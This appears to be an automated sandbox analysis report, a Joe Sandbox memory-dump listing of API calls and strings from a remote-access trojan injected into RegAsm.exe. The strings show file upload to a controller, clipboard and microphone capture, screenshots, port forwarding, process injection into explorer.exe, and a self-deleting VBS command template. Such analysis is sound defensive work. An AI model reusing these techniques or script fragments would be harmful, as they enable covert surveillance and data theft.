                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                  • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                  • API String ID: 1579085052-2309681474
                                                  • Opcode ID: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
                                                  • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                  • Opcode Fuzzy Hash: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
                                                  • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                  APIs
                                                  • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                  • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                  • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                  • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                  • _wcslen.LIBCMT ref: 0041C1CC
                                                  • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                  • GetLastError.KERNEL32 ref: 0041C204
                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                  • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                  • GetLastError.KERNEL32 ref: 0041C261
                                                  Similarity
                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                  • String ID: ?
                                                  • API String ID: 3941738427-1684325040
                                                  • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                  • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                  • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                  • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                  Similarity
                                                  • API ID: _free$EnvironmentVariable$_wcschr
                                                  • String ID:
                                                  • API String ID: 3899193279-0
                                                  • Opcode ID: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                                  • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                  • Opcode Fuzzy Hash: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                                  • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6C7C8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                  • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                  • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                  • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Similarity
                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                  • String ID: /stext "$0TG$0TG$NG$NG
                                                  • API String ID: 1223786279-2576077980
                                                  • Opcode ID: cd98076cbd31d0c1f17db76443358eb0b8c5969c5226cb19c20294b0481241c1
                                                  • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                  • Opcode Fuzzy Hash: cd98076cbd31d0c1f17db76443358eb0b8c5969c5226cb19c20294b0481241c1
                                                  • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                  • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                  • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                  Similarity
                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                  • API String ID: 2490988753-744132762
                                                  • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                  • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                  • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                  • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                                  • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                  Similarity
                                                  • API ID: CloseEnumOpen
                                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                  • API String ID: 1332880857-3714951968
                                                  • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                  • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                  • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                  • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                  • GetCursorPos.USER32(?), ref: 0041D67A
                                                  • SetForegroundWindow.USER32(?), ref: 0041D683
                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                  • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                  • ExitProcess.KERNEL32 ref: 0041D6F6
                                                  • CreatePopupMenu.USER32 ref: 0041D6FC
                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                  Similarity
                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                  • String ID: Close
                                                  • API String ID: 1657328048-3535843008
                                                  • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                  • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                  • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                  • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                  Similarity
                                                  • API ID: _free$Info
                                                  • String ID:
                                                  • API String ID: 2509303402-0
                                                  • Opcode ID: d4b587b978178a04d77a312406460529d21981b93c8e51504b7a0db7e668213d
                                                  • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                  • Opcode Fuzzy Hash: d4b587b978178a04d77a312406460529d21981b93c8e51504b7a0db7e668213d
                                                  • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                  • __aulldiv.LIBCMT ref: 00408D88
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                  • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                  • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                  • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                  • API String ID: 3086580692-2582957567
                                                  • Opcode ID: 4f195d3c0c62a6e45262181e9b7fb43f1a1b55c9fe98746a0176ab88057bb64b
                                                  • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                  • Opcode Fuzzy Hash: 4f195d3c0c62a6e45262181e9b7fb43f1a1b55c9fe98746a0176ab88057bb64b
                                                  • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                  • _free.LIBCMT ref: 0045137F
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 004513A1
                                                  • _free.LIBCMT ref: 004513B6
                                                  • _free.LIBCMT ref: 004513C1
                                                  • _free.LIBCMT ref: 004513E3
                                                  • _free.LIBCMT ref: 004513F6
                                                  • _free.LIBCMT ref: 00451404
                                                  • _free.LIBCMT ref: 0045140F
                                                  • _free.LIBCMT ref: 00451447
                                                  • _free.LIBCMT ref: 0045144E
                                                  • _free.LIBCMT ref: 0045146B
                                                  • _free.LIBCMT ref: 00451483
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                  • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                  • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                  • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0041A04A
                                                  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                  • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                  • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                  Similarity
                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                  • API String ID: 489098229-1431523004
                                                  • Opcode ID: 9ca3d8a5fd9104a035863b57295875439c18cda5a03c1d5b6dbcacfb627d70fe
                                                  • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                  • Opcode Fuzzy Hash: 9ca3d8a5fd9104a035863b57295875439c18cda5a03c1d5b6dbcacfb627d70fe
                                                  • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                    • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                    • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                    • Part of subcall function 00413733: RegCloseKey.ADVAPI32(00000000), ref: 00413773
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                  • ExitProcess.KERNEL32 ref: 0040D9FF
                                                  Similarity
                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                  • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                  • API String ID: 1913171305-3159800282
                                                  • Opcode ID: 56d1356c42dc7fa533c5c42bb4693ab64f4e1a1f048b498cab8c93b269848ee8
                                                  • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                  • Opcode Fuzzy Hash: 56d1356c42dc7fa533c5c42bb4693ab64f4e1a1f048b498cab8c93b269848ee8
                                                  • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                                  • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                  • Opcode Fuzzy Hash: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                                  • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                  APIs
                                                    • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                  • GetLastError.KERNEL32 ref: 00455D6F
                                                  • __dosmaperr.LIBCMT ref: 00455D76
                                                  • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                  • GetLastError.KERNEL32 ref: 00455D8C
                                                  • __dosmaperr.LIBCMT ref: 00455D95
                                                  • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                  • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                  • GetLastError.KERNEL32 ref: 00455F31
                                                  • __dosmaperr.LIBCMT ref: 00455F38
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                  • String ID: H
                                                  • API String ID: 4237864984-2852464175
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  • API ID: _free
                                                  • String ID: \&G$\&G$`&G
                                                  • API String ID: 269201875-253610517
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  • API ID:
                                                  • String ID: 65535$udp
                                                  • API String ID: 0-1267037602
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                  • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                  • __dosmaperr.LIBCMT ref: 0043A926
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                  • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                  • __dosmaperr.LIBCMT ref: 0043A963
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                  • __dosmaperr.LIBCMT ref: 0043A9B7
                                                  • _free.LIBCMT ref: 0043A9C3
                                                  • _free.LIBCMT ref: 0043A9CA
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                  • String ID:
                                                  • API String ID: 2441525078-0
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                  • TranslateMessage.USER32(?), ref: 0040557E
                                                  • DispatchMessageA.USER32(?), ref: 00405589
                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                  • API String ID: 2956720200-749203953
                                                  APIs
                                                    • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                  • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                  • String ID: 0VG$0VG$<$@$Temp
                                                  • API String ID: 1704390241-2575729100
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 0041697C
                                                  • EmptyClipboard.USER32 ref: 0041698A
                                                  • CloseClipboard.USER32 ref: 00416990
                                                  • OpenClipboard.USER32 ref: 00416997
                                                  • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                  • CloseClipboard.USER32 ref: 004169BF
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                  • String ID: !D@
                                                  • API String ID: 2172192267-604454484
                                                  APIs
                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                  • CloseHandle.KERNEL32(?), ref: 004134A0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                  • String ID:
                                                  • API String ID: 297527592-0
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  APIs
                                                  • _free.LIBCMT ref: 004481B5
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 004481C1
                                                  • _free.LIBCMT ref: 004481CC
                                                  • _free.LIBCMT ref: 004481D7
                                                  • _free.LIBCMT ref: 004481E2
                                                  • _free.LIBCMT ref: 004481ED
                                                  • _free.LIBCMT ref: 004481F8
                                                  • _free.LIBCMT ref: 00448203
                                                  • _free.LIBCMT ref: 0044820E
                                                  • _free.LIBCMT ref: 0044821C
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  • API ID: Eventinet_ntoa
                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                  • API String ID: 3578746661-3604713145
                                                  APIs
                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  • API ID: DecodePointer
                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                  • API String ID: 3527080286-3064271455
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  • Sleep.KERNEL32(00000064), ref: 0041755C
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                  • API String ID: 1462127192-2001430897
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  • API ID: CurrentProcess
                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                  • API String ID: 2050909247-4242073005
                                                  APIs
                                                  • _strftime.LIBCMT ref: 00401D50
                                                    • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                  • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                  • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                  • API String ID: 3809562944-243156785
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                  • int.LIBCPMT ref: 00410EBC
                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                  • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                  • String ID: ,kG$0kG
                                                  • API String ID: 3815856325-2015055088
                                                  APIs
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
